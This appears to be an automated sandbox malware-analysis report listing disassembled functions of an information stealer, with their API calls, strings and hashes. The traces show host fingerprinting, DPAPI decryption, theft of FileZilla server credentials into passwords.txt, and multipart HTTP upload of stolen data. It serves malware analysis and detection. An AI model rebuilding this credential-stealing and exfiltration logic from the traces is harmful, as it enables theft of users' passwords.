Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

LocalFree.KERNEL32(00000000), ref: 00410EFF

Strings

/ , xrefs: 00410E73

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54

Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412589
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
StrCmpCA.SHLWAPI(?), ref: 004125DC
CloseHandle.KERNEL32(00000000), ref: 004125F0

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25

Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 004080A9

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90

Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Process32Next.KERNEL32(00000000,00000128), ref: 00411542
CloseHandle.KERNEL32(00000000), ref: 0041154D

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69

Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
HeapAlloc.KERNEL32(00000000), ref: 00410D50
GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
wsprintfA.USER32 ref: 00410D7D

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785

Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FD4
wsprintfA.USER32 ref: 00410FEC

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

lstrlenA.KERNEL32(?), ref: 00405519

Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,b26735cbe8ca9e75712ffe3aa40c4a60,",build_id,00437814,------), ref: 00405C67
lstrlenA.KERNEL32(?), ref: 00405C7A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
HeapAlloc.KERNEL32(00000000), ref: 00405C99
lstrlenA.KERNEL32(?), ref: 00405CA6
_memmove.LIBCMT ref: 00405CB4
lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
_memmove.LIBCMT ref: 00405CD6
lstrlenA.KERNEL32(?), ref: 00405CE4
lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
_memmove.LIBCMT ref: 00405D05
lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
ExitProcess.KERNEL32 ref: 00405E46

Strings

", xrefs: 00405C35
", xrefs: 0040581B
", xrefs: 0040597B
------, xrefs: 00405B5D
", xrefs: 00405AD8
------, xrefs: 0040589D
ERROR, xrefs: 00405F2F
------, xrefs: 004059FF
--, xrefs: 00405600
ERROR, xrefs: 00405D79
build_id, xrefs: 0040594F
------, xrefs: 00405605
------, xrefs: 0040573C
file_data, xrefs: 00405C09
b26735cbe8ca9e75712ffe3aa40c4a60, xrefs: 004059A7
block, xrefs: 00405E30

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$b26735cbe8ca9e75712ffe3aa40c4a60$block$build_id$file_data
API String ID: 2638065154-3708530033
Opcode ID: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
Opcode Fuzzy Hash: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

strtok_s.MSVCRT ref: 0040E77E
GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
lstrlenA.KERNEL32(00000000), ref: 0040E7EA
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
lstrlenA.KERNEL32(00000000), ref: 0040E829
StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
lstrlenA.KERNEL32(00000000), ref: 0040E862
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
lstrlenA.KERNEL32(00000000), ref: 0040E89B
lstrlenA.KERNEL32(?), ref: 0040E901
lstrlenA.KERNEL32(?), ref: 0040E915
lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E71F
Login: , xrefs: 0040E98C
passwords.txt, xrefs: 0040EA4D
<Port>, xrefs: 0040E818
<Pass encoding="base64">, xrefs: 0040E88A
Soft: FileZilla, xrefs: 0040E948
Password: , xrefs: 0040E9AE
Host: , xrefs: 0040E954
<Host>, xrefs: 0040E7D9
<User>, xrefs: 0040E851

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
